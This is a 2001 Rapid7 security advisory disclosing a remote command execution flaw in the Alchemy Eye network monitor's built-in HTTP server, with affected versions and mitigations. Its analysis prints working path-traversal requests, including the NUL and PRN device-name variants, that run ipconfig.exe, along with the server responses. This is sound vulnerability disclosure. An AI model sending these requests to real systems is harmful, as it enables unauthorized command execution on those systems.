Back to Advisories

Advisories

Rapid7 Advisory R7-0001: Alchemy Eye HTTP Remote Command Execution

CVE ID: CAN-2001-0871
Bugtraq ID: 3599

Summary

November 29, 2001 - Alchemy Eye and Alchemy Network Monitor are network management tools for Microsoft Windows. The product contains a built-in HTTP server for remote monitoring and control. This HTTP server allows arbitrary commands to be run on the server by a remote attacker.

The Common Vulnerabilities and Exposures (CVE) project has assigned the identifier CAN-2001-0871 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

Bugtraq has assigned the identifier 3599 to this vulnerability. More information on Bugtraq can be found at http://www.securityfocus.com

Affected Systems

KNOWN VULNERABLE:

  • Alchemy Eye and Alchemy Network Monitor v2.0 through v2.6.18 (vulnerable to first variant, see below)
  • Alchemy Eye and Alchemy Network Monitor v2.6.19 through v3.0.10 (vulnerable to second variant, see below)

Apparently NOT VULNERABLE:

  • Alchemy Eye v1.7 (has no web access feature)
  • Alchemy Eye v1.8 (has no web access feature)

Detailed Analysis

Versions 2.x through 2.6 are vulnerable to arbitrary remote command execution by using a simple dotdot traversal.

$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0

HTTP/1.0 200 OK
Date: Thu, 29 Nov 2001 18:20:00 GMT
Server: Alchemy Eye/2.0.20
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275

Windows 2000 IP Configuration

Ethernet adapter Cable:

Connection-specific DNS Suffix . : foo.bar.com
IP Address. . . . . . . . . . . . : 192.168.0.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

Later patched 2.6 revisions are not vulnerable to the simple dotdot traversal:

$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0

HTTP/1.0 403 Forbidden
Server: Alchemy Eye/2.6.16
MIME-version: 1.0
Content-Type: text/plain
Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe
Content-Length: 9

Forbidden

However, these versions are vulnerable to a variant that combines dotdot traversal with the special Windows device name "NUL":

$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe HTTP/1.0

HTTP/1.0 200 OK
Server: Alchemy Eye/2.6.16
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275

Windows 2000 IP Configuration

Ethernet adapter Cable:

Connection-specific DNS Suffix . : foo.bar.com
IP Address. . . . . . . . . . . . : 192.168.0.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

Versions 2.7.x and above address the "NUL" issue but are still vulnerable if you use a device name other than "NUL", e.g. "PRN":

$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe HTTP/1.0

HTTP/1.0 200 OK
Server: Alchemy Eye/3.0.10
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275

Windows 2000 IP Configuration

Ethernet adapter Cable:

Connection-specific DNS Suffix . : foo.bar.com
IP Address. . . . . . . . . . . . : 192.168.0.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

The attacker can not run commands with arguments because the HTTP server does not handle URL-encoded spaces (%20), nor does it handle actual spaces.

Solution

The current version of the product is VULNERABLE. Future versions may also be vulnerable. If you are using any of the vulnerable versions, we suggest the following:

(a) Disable HTTP access completely via Preferences. You must restart the product for this to take effect.

or, (b) Require HTTP authentication via Preferences. You must restart the product for this to take effect. This is only possible with versions 2.6.x and later (earlier versions have no authentication option).

(c) Create a very restricted user account and run the product under those credentials.

Disclaimer and Copyright

Rapid7, LLC is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.

This advisory Copyright (C) 2001 Rapid7, LLC. Permission is hereby granted to redistribute this advisory in electronic media only, providing that no changes are made and that the copyright notices and disclaimers remain intact. This advisory may not be printed or distributed in non-electronic media without the express written permission of Rapid7, LLC.

Vendor Info

Alchemy Eye
Alchemy Labs, Inc.
http://www.alchemy-lab.com/products/eye/

Alchemy Network Monitor
DEK Software, Inc.
http://www.deksoftware.com/alchemy/

Vendors notified 7/25/2001. Initial problem fixed shortly thereafter but subsequent releases (up to and including the current release, v3.0.10) are still vulnerable to a variant of the same attack. Vendor is aware of the problems but has stopped responding to our emails.